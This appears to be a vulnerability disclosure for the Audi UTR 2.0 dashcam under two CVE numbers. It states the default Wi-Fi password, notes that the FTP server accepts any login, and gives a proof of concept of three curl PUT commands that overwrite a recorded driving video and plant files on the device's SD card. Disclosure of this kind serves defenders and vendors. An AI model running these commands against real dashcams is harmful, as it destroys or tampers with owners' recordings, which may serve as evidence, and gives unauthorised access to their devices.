CVE : CVE-2025-45586
The Audi dashcam UTR 2.0 can be controlled via Wi-Fi.
There is a default password for the Wi-Fi, which is "1234567890".
A port scan reveals that a total of 9 ports are open. These include ports commonly associated with well-known protocols such as FTP, WEB, and RTFP, along with several other ports that are also open.
A vulnerability exists where the PUT method allows overwriting of existing files and creation of new files.
UTR 2.0 - Control Proof of Concept (PoC)
curl -v -i -X PUT <http://192.168.1.1/sd/DRIVING/20240918_003226D.mp4> -d "A"
curl -v -i -X PUT <http://192.168.1.1/sd/DRIVING/Hacked> -d "A"
curl -v -i -X PUT <http://192.168.1.1/sd/Hacked> -d "A"
CVE : CVE-2025-45583
The FTP server allows any username/password combination to successfully authenticate. This suggests either an authentication bypass or a fundamentally flawed authentication implementation, where user credentials are not validated at all.
root/root
guest/guest